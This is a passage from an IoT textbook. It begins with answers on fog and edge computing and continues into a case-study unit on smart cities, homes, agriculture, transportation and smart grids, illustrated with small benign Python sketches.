b) Reduced bandwidth
c) Reduced cost
d) Mobility

Various challenges associated with fog are –

a) Complexity
b) Maintaining security
c) Authenticating
d) Additional power consumption

2. Various application areas of fog computing are –

a) Smart Cities
Fog computing can play a vital role in building smart cities. With the help of smart devices,
IoT devices and fog devices, it is possible to do tasks like – creating smart homes and
buildings by energy management of buildings, maintaining security, etc.

b) Smart Car and Traffic Control System


By making use of IoT devices and ubiquitous fog devices, vehicle-to-vehicle (V2V) and
vehicle-to-infrastructure (V2I) communication is possible. Fog devices after computation can
direct the vehicle or infrastructure to take action with the help of various controls (actuators).

c) Surveillance
Security and Surveillance cameras are deployed in many areas. Data collected from these can
be forwarded to nearby fog servers. Fog servers in turn can perform video processing to find
out problems like theft, kidnapping, murders, etc.

Solutions to Check your progress 3

1. Edge computing is a technology which offers data processing on the same layer where data is
generated by making use of edge devices having computation capabilities. This allows data to be
processed even faster than processing at fog devices at no or a very low cost. This also increases
utilization of edge devices.

2. Various differences between cloud, fog and edge computing are –

Cloud Computing | Fog Computing | Edge Computing
Centralized approach | Distributed approach | Distributed approach
Large amount of resources | Intermediate amount of resources | Limited resources
High latency | Medium latency | Low latency
Low data rate | Medium data rate | High data rate
Globally distributed | Regionally distributed | Locally distributed
Non-real time response | Near real time response | Real time response
Can be accessed with internet | Can be accessed with or without internet | Can be accessed without internet

3. Some applications of edge computing are -

a) Gaming
Games that require a live streaming feed depend heavily on latency. Here, edge servers are placed close to the gamers to reduce latency.
b) Content Delivery
Content such as web pages and videos can be cached near users in order to improve performance by delivering it quickly.
c) Smart Homes
IoT devices can collect data from around the house and process it. The response generated is secure and in real time, as the round-trip time is reduced; for example, the responses generated by Amazon’s Alexa.

UNIT 12 IoT CASE STUDIES
Structure

12.0 Introduction
12.1 Objectives
12.2 IoT Use Cases for Smart Cities
12.3 Smart Homes
12.4 Applications of IoT in Agriculture
12.5 Smart Transportation
12.6 Smart Grids
12.6.1 Key Features of Smart Grid
12.6.2 Benefits of Smart Grid
12.7 Connected Vehicles
12.7.1 Connected Cars
12.7.2 How does Connected Car Technology Work?
12.7.3 Features of Connected Cars
12.7.4 Types of Connectivity
12.8 Smart Healthcare
12.9 Industrial IoT (IIoT)
12.9.1 Industry 4.0 and IIoT
12.9.2 IIoT Architecture
12.9.3 Applications of IIoT
12.9.4 IIoT Use Cases
12.10 Summary
12.11 Solutions/Answers
12.12 Further Readings

12.0 INTRODUCTION

In the earlier units, we studied various concepts, namely Fog Computing, Edge Computing, IoT Networking and Connectivity Technologies. After going through the basics of IoT in the previous units, we will focus on applications of IoT in this unit.

Artificial Intelligence (AI) and the Internet of Things (IoT) are two technologies that are growing rapidly day by day and are heading towards an extremely intelligent future.

IoT enables seamless communication between people and things by connecting


everyday utilities such as home appliances, security systems, kitchen
appliances, thermostats, cars, baby monitors, and more via embedded unique
identifiers (UIDs). The connected devices transmit data over the internet
without needing human-to-computer interaction.

The number of connected mobile IoT devices is set to grow immensely and is expected to reach 23.14 billion by 2027 and 29 billion by 2030. Organizations across the spectrum are using IoT to operate more effectively. IoT allows enterprises to improve decision-making, enhance customer service, and increase business value. Additionally, cloud platform availability empowers individuals and businesses to access and scale up infrastructure without managing it.

In addition, there are 4 pillars of IoT applications. They are as follows:

 Connecting people in more meaningful and valuable ways - The


Internet has become an indispensable part of most people’s lives, and
this is unlikely to change anytime soon.
 Transforming data into intelligence in order to make better decisions
- Sensors generate massive amounts of raw data for the purpose of
analysis, but there is no standard format for storing and reusing it.
 Providing the appropriate information to the appropriate person - If
we want to learn something new and benefit from it, we must deliver it
to the right person.
 Using the right machine at the right time - The use of smart devices in
our daily lives is also becoming more common.

In this unit we will focus on various applications of IoT in Smart Cities, Smart
Homes, Smart Transportation, Smart Grids, Smart Healthcare, Connected
Vehicles and Industrial IoT.

12.1 OBJECTIVES

After going through this unit, you shall be able to:

 understand various IoT applications;


 list and describe various use-cases for Smart Cities;
 describe the IoT applications of Smart Homes;
 discuss key features, benefits and applications of Smart Grids;
 describe the features and working of connected vehicles;
 elucidate the applications of IoT in healthcare; and
 explain Industry 4.0, IIoT and applications of IIoT.

12.2 IoT USE CASES FOR SMART CITIES

Big and small cities are becoming densely populated, and municipalities are facing a wide range of challenges that require immediate attention. Urban crime, traffic congestion, sanitation problems and environmental deterioration are some of the common consequences of an increased population in urban areas, and to address these, municipalities turn to the adoption of smart technologies such as the Internet of Things (IoT).
IoT holds the potential to cater to the needs of the increased urban population while making living more secure and comfortable. The IoT use cases for smart cities are therefore almost limitless, contributing to public safety, optimized traffic control, a healthier environment and more, which are the main goals of smart city development.

The following section focuses on popular IoT use cases for smart cities that are worth implementing.

12.2.1. Smart Traffic Management

With the increased population, the traffic congestion on the roads is also
increasing. However, smart cities aim to make the citizens reach the desired
destination efficiently and safely. To achieve this aim, municipalities turn to
smart traffic solutions which are enabled by IoT technologies.

Different types of sensors are utilized in smart traffic solutions, which also extract relevant data from drivers’ smartphones to determine vehicle speed and GPS location. Concurrently, green-light timing is monitored by smart traffic lights linked to a cloud management platform. Based on the current traffic situation, the traffic lights are automatically adjusted, which ultimately reduces traffic congestion on the roads. Furthermore, by utilizing historical data, IoT solutions can predict future traffic conditions in smart cities and enable municipalities to prevent potential congestion.
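As a rough illustration of how green-light timing could be adjusted from sensor data, the short Python sketch below lengthens the green phase on congested approaches. The constants and the function name green_time are assumptions made for the example, not values from any real deployment.

BASE_GREEN = 20          # seconds of green in light traffic
EXTRA_PER_VEHICLE = 1.5  # extra seconds granted per waiting vehicle
MAX_GREEN = 60           # upper cap so other approaches are not starved

def green_time(waiting_vehicles):
    # lengthen the green phase on congested approaches, within the cap
    return min(BASE_GREEN + EXTRA_PER_VEHICLE * waiting_vehicles, MAX_GREEN)

for count in (2, 15, 40):
    print(count, "waiting vehicles ->", green_time(count), "seconds of green")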

12.2.2. Smart Parking

The issue of parking in cities seems inevitable, but many cities around the globe are adopting IoT-enabled smart parking solutions and providing hassle-free parking experiences to their citizens. With the help of road-surface sensors on parking spots and GPS data from the driver’s phone, smart parking solutions identify and mark the parking spots that are available or occupied. Alongside this, an IoT-based smart parking solution creates a real-time parking map on a mobile or web application. The sensors embedded in the ground send data to the cloud and server, which notifies the driver whenever the nearest parking spot is free. Instead of blindly driving around, a smart parking solution helps the driver to find a parking spot easily.
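A minimal sketch of the "nearest free spot" step is shown below, assuming the cloud platform already holds the occupancy status reported by the ground sensors; the spot list and coordinates are invented for illustration.

import math

spots = [
    {"id": "A1", "free": False, "x": 0.0, "y": 0.0},
    {"id": "B4", "free": True,  "x": 0.3, "y": 0.1},
    {"id": "C2", "free": True,  "x": 1.2, "y": 0.9},
]

def nearest_free_spot(driver_x, driver_y):
    # choose the closest spot whose ground sensor reports it as free
    free = [s for s in spots if s["free"]]
    return min(free, key=lambda s: math.hypot(s["x"] - driver_x, s["y"] - driver_y), default=None)

print(nearest_free_spot(0.2, 0.2))   # the app would then guide the driver to spot B4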

12.2.3. Public Transport Management

Managing public transport efficiently is one of the major concerns of the big
cities. However, IoT offers a use case for smart cities in this regard as well.
The IoT sensor associated with public transport gathers and analyzes data
which help the municipalities to identify the patterns in which the citizens are
using public transport. Later on, this data-driven information is used by the
traffic operators to achieve the standardized level of punctuality and security in
transportation along with enhancing the travelling experience of the citizens.

12.2.4. Utility Management

IoT enabled smart city solutions give citizens complete control over home
utilities and save their money as well. Different utility approaches are powered
by IoT. These include smart meter and billing solutions, identification of
consumption patterns and remote monitoring. Smart meters transfer data to the
public utility through a telecom network, making the meter readings reliable.
This solution also enables utility companies to accurately bill the amount of
gas, energy and water consumed per household. A smart network of meters
facilitates utility companies to monitor the consumption of resources in real-
time to balance the supply and demand. This indicates that the IoT not only
offers the benefit of utility control to the consumers but also helps the utility
companies to manage their resources.

12.2.5. Street Lighting

Smart city development aims to improve the quality of life and make living easy, cost-effective and sustainable. The majority of traditional street lights on the roads waste power, as they are always switched on even when no vehicle or person is passing. IoT enables cities to save power by embedding sensors in street lights and connecting them with a cloud management solution, which helps in managing the lighting schedule. Smart lighting solutions collect data on the movement of vehicles and people and link it to historical data (e.g. time of day, public transport schedules and special events). The data is then analyzed to improve and manage the lighting schedule in smart cities. In other words, the smart lighting solution analyzes the outer conditions and directs the street light to switch on or off, brighten or dim, as required.

12.2.6. Waste Management

The waste collection operators in cities use predefined schedules to empty the waste containers. This traditional waste collection approach is not only inefficient but also leads to unnecessary fuel consumption and unproductive trips by waste-collection trucks. IoT offers waste collection optimization by tracking waste levels, along with providing operational analytics and route optimization, to manage the waste collection schedule efficiently.

IoT sensors are attached to the waste containers. These sensors monitor the
level of waste in the containers. When the waste reaches the threshold, waste
truck drivers are immediately notified through the mobile application. Hence,
only the full containers are emptied by the truck drivers.
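The threshold rule above can be expressed in a few lines; the 80% threshold and the container readings are illustrative values only.

FILL_THRESHOLD = 0.8   # notify drivers once a container is 80% full

def containers_to_empty(fill_levels):
    # fill_levels maps container id -> fill fraction reported by its sensor
    return [cid for cid, level in fill_levels.items() if level >= FILL_THRESHOLD]

readings = {"bin-17": 0.35, "bin-18": 0.92, "bin-19": 0.81}
print("Notify drivers about:", containers_to_empty(readings))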

12.2.7. Environmental Well-being

Smart cities are focused on providing a healthy environment to the citizens.


IoT-enabled smart city solutions help the municipalities in monitoring the
environmental conditions that might be harmful to human beings. For instance,
sensors can be attached to the water grid to inspect the quality of water in
cities. The cloud platforms with which the sensors are in communication
immediately generate triggers when the chemical composition of the water
changes or leakage occurs. This smart solution helps quality management
organizations prevent water contamination and fix the issue as soon as
possible. IoT solutions are also applicable for measuring air quality, identifying the areas where air pollution is critical and recommending solutions to improve the air quality.

12.2.8. Public Safety

Providing safety to the citizens is an ultimate goal of municipalities. In this regard, IoT-based smart city technologies provide decision-making tools, analytics and real-time monitoring for enhancing public safety. Sensors and CCTV cameras are deployed throughout the city, and the data from them is combined to predict likely crime scenes. This allows the law enforcement bodies and police to track perpetrators in real time and stop them from causing potential harm to the public.

12.2.9. Improved Bike Sharing Services with Geolocation

Bike sharing is becoming extremely popular in cities to tackle the challenges of climate change and offer residents an alternative way to commute. With timely updates on the location of bikes sent through the IoT network, cities and bike-sharing companies can operate services more efficiently by matching supply to demand in the areas where bikes are needed. This not only helps to curb irresponsible behaviour such as illegal parking and bike hogging, it also reduces problems of theft and vandalism.

12.2.10. Monitor Employee Attendance Remotely

Time clocks connected to the Internet via the IoT network allow employers to monitor the attendance of workers on remote job sites. Constant, real-time connected monitoring removes the hassle of SIM cards for tracking employee comings and goings.

12.2.11. Monitoring User Satisfaction

User feedback is essential to improve public services and increase satisfaction. It is even better when that feedback can be collected in real time, immediately after the experience.

Install a small, customizable, connected dashboard or button to collect user feedback effortlessly, using colour codes to trigger instant responses as guests leave public service buildings. The data is then available in the cloud for visualization and real-time satisfaction insights. Alerts based on specific thresholds or results can also be triggered for a faster response.

12.2.12. Improved Data Collection for Better Air Quality Monitoring

Various sensors are easy to install and so cheap to run that an entire city can be
covered, enabling dozens of metrics to be tracked such as humidity,
temperature, air quality and more. Some cities have installed sensors on
moving locations such as trams and buses to collect even more data throughout
the day. With increased availability of data, it’s easy to build interactive, real-
time mapping of air pollution and improve pollution prediction through
Machine Learning.

12.2.13. Optimized Refuse Collection Routes with Connected Dumpsters

Collection routes can be optimized with low-power connected ultrasonic sensors that indicate the level of waste in dumpsters. The sensors also provide valuable data about dumpster usage, emptying cycles and more, which can be used to consolidate routes and save time, energy and money.

12.2.14. Collecting Consumption Data Effortlessly

Put an end to manual on-site meter readings and data processing of water, gas
and electricity consumption. You can now monitor and optimize your remote
assets in real-time, detecting issues such as leaks and breakdowns. Service
companies can also automate billing and remotely activate and deactivate
services. IoT-enabled meters can transmit data immediately over the public
network with no pairing or configuration required and no need to replace or
recharge batteries for years.

12.2.15. Fire Hydrants – Monitoring Potential Issues in Real-time

With IoT-enabled pressure sensors, operators get real-time alerts when fire hydrants are in use and can also know how much water is consumed. An accelerometer sensor can send alerts instantly if a hydrant is broken, leaking or malfunctioning, and a temperature monitor can help prevent cold-weather damage in inclement and wintry conditions.

12.2.16. Checking Soil Moisture

Soil condition monitoring can be done remotely and cost efficiently to help
minimize plant stress caused by dehydration. Besides reducing the cost of
replacing plants, these solutions also optimize water usage.

12.2.17. Monitoring and Maintaining Street Lighting Networks Remotely

With IoT-enabled sensors, maintenance operations like detecting overheating, power supply shortages and broken bulbs are possible. Workers need to be deployed only when necessary, instead of carrying out routine maintenance checks. IoT-enabled light intensity sensors can also be installed to remotely control light intensity for energy savings.

Some of the applications are discussed in detail in the next sections.

12.3 SMART HOMES


A smart home is a fully connected household environment that provides its residents with an unprecedented level of control and comfort. The main purpose of smart home IoT devices is to simplify your home life and make it safer and more convenient. In 2021, the concept of smart home automation implies much more than just remote control and automation: IoT, along with emerging technologies like AI, has opened up new possibilities in home automation.

Today, a smart home aims to exceed the consumer’s expectations. It learns about your habits, your favourite music, room temperature and wake-up timings, and determines consumption patterns. These insights help provide a personalized experience at home. Everything can be easily controlled via a smartphone app, so we don’t have to worry about our home security even when we are not there.

Let’s look at the most popular ways to use Smart Home IoT technologies and
understand what the benefits look like.

12.3.1 Smart Lighting

Today, the most widely used smart home application is home lighting. Most people know of tunable lighting that can change between warm and bright, with different colour hues that suit your mood and requirements. A few other use-case scenarios for smart lights are listed below, followed by a small automation sketch.

 As you enter your home, lights can turn on automatically without the
necessity to press a button. This can also work as a safety feature to
detect intrusions.

 The opposite is also possible as you leave your home; the system can
turn the lights off automatically, thereby saving energy.

 Home theatre enthusiasts can have the lights programmed to


automatically dim while watching a movie to provide the best viewing
experience.

 Your light can turn on when your alarm rings in the morning, waking
the whole household up if need be.

 All smart lighting in your home can be connected to your smartphone


and other connected devices and can be voice-controlled.
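A simple automation rule of the kind listed above might look like the following sketch. It is deliberately library-free, and the fixed evening time window standing in for a light sensor is an assumption made for the example.

from datetime import datetime

def desired_light_state(motion_detected, someone_home, now=None):
    # decide what the smart light should do for one update cycle
    now = now or datetime.now()
    after_dark = now.hour >= 19 or now.hour < 6   # crude stand-in for a lux sensor
    if motion_detected and after_dark:
        return "on"                               # welcome light / intrusion indicator
    if not someone_home:
        return "off"                              # save energy when the house is empty
    return "unchanged"

print(desired_light_state(motion_detected=True, someone_home=True))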


12.3.2 Smart Kitchen

Smart home automation devices can make the cooking process safer and
convenient too.

 It can turn on the lights or play soothing music when you enter the
kitchen.

 Smart sensors can check for gas leaks, smokes, water leakages and turn
off the power in the house if the indicators are outside the optimum
range.

 Appliances like refrigerators, chimneys etc., can be controlled through


voice-activated devices.

12.3.3 Smart Safety and Security Systems

Safety sensors identify anything wrong at your home. They can immediately notify home users of anything overlooked, like an appliance left on, or of any potential threats, and can even trigger the necessary action to prevent them.

 Proximity, motion and video sensors can identify if a burglar makes an


attempt to break into your home and automatically turn on the panic
alarm, lights and call the police.

 Smart home users can check their home state remotely through the app
on their phones and control pretty much everything at home.

 While locking the door, you can set controllers to automatically close
the curtains, turn off devices and ensure your home is protected against
any trespassers.

 You can monitor your elderly relatives and automate things remotely
for them if needed.

12.3.4 Smart Bathrooms

Smart home IoT technologies in the bathroom can help in power and energy
savings with convenience.

 With smart home automation, you can set your geysers to automatically turn on and off in a pre-set pattern based on your shower routine.

 This also helps make your home energy efficient by eliminating the
unnecessary functioning of high power-consuming home appliances
like geysers, heaters, ACs.


12.3.5 Smart Gardens

A smart home can be exceptionally beneficial for those plant lovers interested
in growing vegetables, fruit, herbs, and indoor plants at home.

 The technology allows users to check if the plant is adequately


hydrated and receiving the necessary amount of sunlight.

 You can monitor your plant and turn on your smart irrigation system
when needed. You can control and stop the watering system, thus
optimizing water usage

 Smart home IoT technology has led to a real breakthrough in


gardening, which will completely remodel the traditional approach to
growing plants.

12.3.6 Smart Temperature Control

With temperature control automation, you can optimize your ACs to provide
the best experience while being energy efficient.

 For instance, users can turn on their bedroom ACs as they drive from
the office to enjoy a cool room once home after a tiring day.

 You can configure the bedroom AC with your geyser times, so once
you step out from your bath, the room is ready for you.

 You can set the ACs to function based on the room temperature while
you sleep at night. So you are neither cold nor hot and get a good
night’s sleep.

12.3.7 Smart Doors

We can safely assume the doors of our future will not need keys. Digital locks
are safe and can be set to initiate a sequence of other devices in your home.

 For instance, opening the door can trigger a customized sequence of actions, like the lights switching on, inside doors unlocking, and the music and ACs turning on.

 The entry door digital lock can identify who opened the door when.
With a custom entry assigned for each individual, you can know when
your kids, your hubby, or your maid reached home through
notifications on your smartphones.

So far, IoT has disrupted many industries, and the agriculture industry is no exception. In the following section, let us study smart agriculture applications using IoT.

12.4 APPLICATIONS OF IoT IN AGRICULTURE

Throughout the world, mechanical innovations such as tractors and harvesters were introduced into agricultural operations in the late 20th century, and the agriculture industry continues to rely heavily on innovative ideas because of the steadily growing demand for food.

The Industrial IoT (IIoT) has been a driving force behind increased agricultural production at a lower cost. In the next several years, the use of smart solutions powered by IoT will increase in agricultural operations. In fact, recent reports suggest that IoT device installation will see a compound annual growth rate of 20% in the agriculture industry, and that the number of connected agricultural devices will grow from 13 million in 2014 to 225 million by 2024.

IoT in agriculture has emerged as a second wave of the green revolution. The benefits that farmers get by adopting IoT are twofold: it has helped farmers decrease their costs and increase yields at the same time, by improving decision-making with accurate data.

Smart Farming is a hi-tech and effective system of doing agriculture and growing food in a sustainable way. It is the application of connected devices and innovative technologies together in agriculture. Smart Farming depends heavily on IoT, reducing the physical work of farmers and growers and thus increasing productivity in every possible manner.

With recent agricultural trends increasingly dependent on technology, IoT has brought huge benefits like efficient use of water, optimization of inputs and many more. These benefits have revolutionized agriculture in recent years.

IoT-based Smart Farming improves the entire agriculture system by monitoring the field in real time. With the help of sensors and interconnectivity, IoT in agriculture has not only saved farmers’ time but has also reduced the extravagant use of resources such as water and electricity. It keeps various factors like humidity, temperature and soil condition under check and gives a crystal-clear real-time view.

Following are some of the benefits of adopting IoT in Agriculture:

12.4.1 Real-Time Weather Conditions

Climate plays a very critical role in farming, and improper knowledge of the climate heavily deteriorates the quantity and quality of crop production. IoT solutions enable you to know the real-time weather conditions. Sensors are placed inside and outside the agricultural fields. They collect data from the environment which is used to choose the right crops that can grow and sustain themselves in the particular climatic conditions. The whole IoT ecosystem is made up of sensors that can detect real-time weather conditions like humidity, rainfall and temperature very accurately. Numerous sensors are available to detect all these parameters and can be configured to suit your smart farming requirements. These sensors monitor the condition of the crops and the weather surrounding them, and if any disturbing weather conditions are found, an alert is sent.

12.4.2 Precision Farming

Precision Farming is one of the most famous applications of IoT in


Agriculture. It makes the farming practice more precise and controlled by
realizing smart farming applications such as livestock monitoring, vehicle
tracking, field observation, and inventory monitoring. The goal of precision
farming is to analyze the data, generated via sensors, to react accordingly.
Precision Farming helps farmers to generate data with the help of sensors and
analyze that information to take intelligent and quick decisions. There are
numerous precision farming techniques like irrigation management, livestock
management, vehicle tracking and many more which play a vital role in
increasing the efficiency and effectiveness. With the help of Precision farming,
you can analyze soil conditions and other related parameters to increase the
operational efficiency. Furthermore, you can also detect the real-time working
conditions of the connected devices to detect water and nutrient level.

12.4.3 Smart Greenhouse

To make greenhouses smart, IoT has enabled weather stations to automatically adjust the climate conditions according to a particular set of instructions. The adoption of IoT in greenhouses has reduced human intervention, making the entire process cost-effective and increasing accuracy at the same time. For example, solar-powered IoT sensors can be used to build modern and inexpensive greenhouses. These sensors collect and transmit real-time data, which helps in monitoring the greenhouse state very precisely. With the help of the sensors, water consumption and the greenhouse state can be monitored via email or SMS alerts. Automatic and smart irrigation is carried out with the help of IoT. The sensors provide information on pressure, humidity, temperature and light levels.
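The kind of rule a greenhouse controller applies can be sketched as below; the setpoint ranges and readings are invented for illustration, and a real system would trigger actuators or SMS/email alerts instead of printing.

SETPOINTS = {"temperature": (18, 28), "humidity": (55, 75), "soil_moisture": (30, 60)}

def actions_for(reading):
    # compare one set of sensor readings against the setpoint ranges
    actions = []
    for name, (low, high) in SETPOINTS.items():
        value = reading[name]
        if value < low:
            actions.append(f"raise {name} (currently {value})")
        elif value > high:
            actions.append(f"lower {name} (currently {value})")
    return actions or ["no action needed"]

print(actions_for({"temperature": 31, "humidity": 60, "soil_moisture": 22}))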

12.4.4 Use of Drones

Technological advancements have almost revolutionized agricultural operations, and the introduction of agricultural drones is the trending disruption. Ground and aerial drones are used for assessment of crop health, crop monitoring, planting, crop spraying and field analysis. With proper strategy and planning based on real-time data, drone technology has given a major boost and makeover to the agriculture industry.

Drones with thermal or multispectral sensors identify the areas that require changes in irrigation. Once the crops start growing, sensors indicate their health and calculate their vegetation index. Smart drones have also reduced the environmental impact; the result has been a massive reduction in chemical use, with much less chemical reaching the groundwater.

12.4.5 Data Analytics

Conventional database systems do not have enough storage for the data collected from IoT sensors. Cloud-based data storage and an end-to-end IoT platform therefore play an important role in the smart agriculture system. In the IoT world, sensors are the primary source of large-scale data collection, and this data is analyzed and transformed into meaningful information using analytics tools.

Data analytics helps in the analysis of weather conditions, livestock conditions and crop conditions. The collected data, combined with these technological innovations, supports better decisions. With the help of IoT devices, you can know the real-time status of the crops by capturing the data from sensors. Using predictive analytics, you can gain insights to make better decisions related to harvesting, and trend analysis helps farmers anticipate upcoming weather conditions and plan crop harvesting. IoT in the agriculture industry has helped farmers maintain the quality of crops and the fertility of the land, thus enhancing the product volume and quality.

In the next section let us study the use of IoT in another important sector i.e.,
Transportation.

12.5 SMART TRANSPORTATION

The utilization of IoT in the transportation industry has gained momentum in


recent times. Within the transportation sector, IoT devices are deployed for a
wide range of applications to provide efficient and secure transport in urban
areas, notably in ticketing, security, surveillance and telematics systems.

IoT in transportation incorporates a wide network of embedded sensors,


actuators, smart objects and other intelligent devices. This network collects
data about the real-world scenario and transmits it over the specialized
software to transform that data into useful information. The operations of the
transport sector have been revolutionized with the help of IoT enabled
technologies and smart solutions. Furthermore, the transportation system in the
urban areas is becoming more complex day by day as the vehicle population on
the road is increasing. This highlights the need of the municipalities to
integrate IoT in transportation to have access to greater and secure
transportation benefits.

Considering the importance of secure and advanced transportation, this section


discusses IoT’s important and common applications that are revolutionizing
the current transport sector.

12.5.1 Efficient Traffic Management

Traffic management is the biggest segment within the transportation industry where the adoption of IoT technologies is observed to be the most prominent. Massive volumes of traffic and vehicle-related data are generated through CCTV cameras. This data is transferred to traffic management centres to keep a closer watch on vehicles and penalize car owners who violate traffic rules and regulations. Smart parking, automatic traffic light systems and smart accident assistance are a few applications of IoT that help traffic and patrolling officers manage traffic efficiently and reduce the risk of accidents.

12.5.2 Automated Toll and Ticketing

The traditional tolling and ticketing systems are not only becoming outdated
but they are also not proving to be effective for assisting the current flow of
vehicles on the road. With the increased number of vehicles on the road, the
toll booths have become busy and crowded as well on the highways and the
drivers have to spend a lot of time waiting for their turn. The toll booths do not
have enough resources and manpower to immediately assist many vehicles.
Compared to traditional tolling and ticketing systems, IoT in transportation
offers automated tolls. With the help of RFID tags and other smart sensors,
managing toll and ticketing have become much easier for traffic police
officers.

The majority of advanced vehicles nowadays have IoT connectivity. A vehicle that is still a kilometre away from the tolling station can easily be detected with the help of IoT technologies, which enables the traffic barriers to be lifted for the vehicle to pass through. Older vehicles do not have IoT connectivity, but the smartphones of the car owners can serve the same purpose, that is, taking automatic payments through phones linked to a digital wallet. This indicates that IoT in transportation is flexible: it is compatible with new vehicles and also integrates easily with older vehicles for automated toll and ticketing procedures.
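The flow from tag detection to wallet debit can be sketched as follows; the tag identifiers, balances and toll amount are invented for illustration.

wallets = {"TAG-1001": 250.0, "TAG-1002": 10.0}   # prepaid balances linked to RFID tags
TOLL = 65.0

def on_tag_detected(tag_id):
    # called when the roadside reader detects a tag approaching the plaza
    balance = wallets.get(tag_id)
    if balance is None or balance < TOLL:
        return "divert to manual booth"
    wallets[tag_id] = balance - TOLL
    return "payment taken - lift barrier"

print(on_tag_detected("TAG-1001"))   # payment taken - lift barrier
print(on_tag_detected("TAG-1002"))   # divert to manual booth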

12.5.3 Self-driving Cars

Self-driving cars or autonomous vehicles are the coolest things that have been
introduced in the transportation industry. In the past decades, the concept of
self-driving cars was just like a dream, but this has been turned into an
innovative reality with the support of IoT technologies. Self-driving cars are
capable of moving safely by sensing the environment, with little or no human
interaction. However, to gather data about the surrounding, self-driving cars
use a wide range of sensors. For instance, the self-driving car uses acoustic
sensors, ultrasonic sensors, radar, LiDAR (Light detection and ranging),
camera and GPS sensors to have information about the surroundings and take
the data-driven decision about mobility accordingly. This indicates that the
functioning of self-driving cars is dependent on IoT sensors. With the help of
IoT, sensors equipped in the self-driving cars continuously gather the data
about the surrounding in real-time and transfer this data either to a central unit
or cloud. The system analyzes the data in a fraction of seconds, enabling the
self-driving cars to perform as per the information provided. This indicates that
IoT connects the sensor network for self-driving cars and enables them to
function in the desired manner.

12.5.4 Advanced Vehicle Tracking or Transportation Monitoring

Vehicle tracking or transportation monitoring systems have become the need
of many businesses to manage their fleets and supply chain processes
effectively. With the help of GPS trackers, transportation companies have
smooth access to real-time location, facts and figures about the vehicle. This
enables the transportation companies to monitor their important assets in real-
time. Apart from location monitoring, IoT devices can also monitor the
driver’s behavior and can inform about the driving style and idling time. In
fleet management systems, IoT has minimized the operating and fuel
expenditures along with the cost of maintenance. As far as transportation
monitoring is concerned, then it can be said that real-time tracking has made
the implementation of smart decisions much easier, enabling the drivers to
identify the issues in the vehicle immediately and take precautions where
necessary.

12.5.5 Enhanced Security of the Public Transport

One of the key areas in which the IoT in transportation is found to be the most
useful is focused on the security of public transport. By keeping an eye on
every transport with the help of IoT devices, municipalities can track traffic
violations and take appropriate actions. Apart from security, IoT in
transportation also complements public transport management by providing a
wide range of smart solutions. This includes advanced vehicle logistic
solutions, passenger information systems, automated fare collection and
integrated ticketing. These solutions help in managing public transport and
traffic congestion. Real-time management of public transport has become
possible with IoT. This has facilitated the transportation agencies to establish
better communication with the passengers and provide necessary information
through passenger information displays and mobile devices. IoT has
undoubtedly made public transport more secure and efficient.

In the next section let us focus on Smart Grids.

12.6 SMART GRIDS

The Internet of Things (IoT) has the power to reshape the way we think about cities across the world. IoT connects people and governments to smart city solutions. Connecting and controlling devices has given rise to smart grid technology, designed to improve and replace older architecture.

Smart grids are electrical grids that involve the same transmission lines,
transformers, and substations as a traditional power grid. What sets them apart
is that Smart Grids involve IoT devices that can communicate with each other
and with the consumers.

Smart grid technology will help tackle the growing demand for renewable
power sources to be integrated into the existing grid, and enable the national
and international vision of low carbon energy. They are designed with energy
efficiency and sustainability in mind. As such, they can measure power
transmission in real-time, automate management processes, reduce power cuts,
and easily integrate various renewable energy sources.

The smart grid must be considered as a mission-critical asset that is part of an


IoT framework. It can be used to remotely monitor and manage:

 Street lighting
 Transmission lines
 Substations
 Cogeneration
 Outage sensors
 Early detection (e.g., power disturbances due to earthquakes and
extreme weather)

The smart grid does this through private, dedicated networks connecting
devices that are distributed to businesses and homes citywide, including:

 Smart meters
 Data concentrators
 Transformers
 Sensors

Smart grid IoT technologies contribute to robust and efficient energy


management solutions lacking in the existing framework. The IoT smart grid
enables two-way communication between connected devices and hardware that
sense and respond to user demands. A smart grid is more resilient and less
costly than the current power infrastructure.

12.6.1 Key Features of Smart Grid

Following are the key features of the Smart Grid:


Load Handling: The load that a power grid needs to supply is ever-changing. Smart grids can advise consumers to change their usage patterns during times of heavy load.

Demand Response Support: Smart grids can help consumers reduce their
electricity bills by advising them to use devices with a lower priority when the
electrical rates are lower. This also helps in the real-time analysis of electrical
usage and charges.
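A demand-response rule of this kind can be sketched in a few lines; the tariff threshold, appliance list and priorities below are invented for the example.

CHEAP_RATE = 4.0   # tariff (per kWh) below which low-priority loads may run

def schedule(appliances, current_rate):
    # appliances: list of (name, priority) pairs with priority "high" or "low"
    return [name for name, priority in appliances
            if priority == "high" or current_rate <= CHEAP_RATE]

appliances = [("refrigerator", "high"), ("washing machine", "low"), ("water heater", "low")]
print(schedule(appliances, current_rate=6.5))   # only the refrigerator runs at the peak rate
print(schedule(appliances, current_rate=3.2))   # everything runs at the cheap rate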

Decentralization of Power Generation: Smart grids help decentralize power


grids since they can easily help incorporate renewable energy sources such as
solar panels at an individual scale and discretion.

12.6.2 Benefits of Smart Grid

Current power grids aren’t made to withstand the immense draw on resources
and the need to transmit data for billions of consumers worldwide. The smart
grid can:

 Detect energy spikes and equipment failure


 Prevent power outages
 Route power to those in need more quickly

Once fully integrated, smart grid technologies can change the way we work
and interact with the world.

Here are some benefits of transitioning to IoT-enabled smart grid technology:

12.6.2.1 Smarter Energy Use

Smart grid technologies will help to reduce energy consumption and costs
through usage and data maintenance. Intelligent lighting through smart city
technology will be able to:

 Monitor usage across various areas


 Immediately adapt to settings like rain or fog
 Adjust output to meet the time of day or traffic conditions
 Detect and address lighting outages instantly

For consumer applications, users can adjust the temperature of their home
thermostats through apps while at work or on vacation.

12.6.2.2 Cleaner Energy Use

Smart grid technologies are less demanding on batteries and more carbon
efficient. They are designed to reduce the peak load on distribution feeders. For
example, the U.S. Department of Energy is integrating green technology into
their IoT smart management for more sustainable solutions. These solutions
have the potential to benefit all distribution chains and include:

 Optimized wind turbines


 Solar cells
 Microgrid technologies
 Feeder automation systems

12.6.2.3 Lower Costs

As the world’s population continues to grow, the older grids won’t keep up
with the increasing demands. Smart grids are designed to lower long-term
costs through smart energy IoT monitoring and source rerouting for fast
recovery when a power failure is detected.

12.6.2.4 Improved Transportation and Parking

As more electric vehicles enter operation, IoT smart sensors can collect real-
time data to relay information to drivers and authorities. Accessing this data
from smart sensors will enable cities to:

 Reduce traffic congestion


 Provide better parking solutions
 Alert drivers to traffic incidents and structural damage to city
landscapes
 Allow for automatic payments at road tolls and parking meters

IoT technology is also at the core of expanding electric charging stations that
heavily tax the power grid.

12.6.2.5 Help with Waste and Water Management

Water treatment and distribution and wastewater processing are significant


drains on the energy grid. Smart cities improve efficiency and reduce costs in
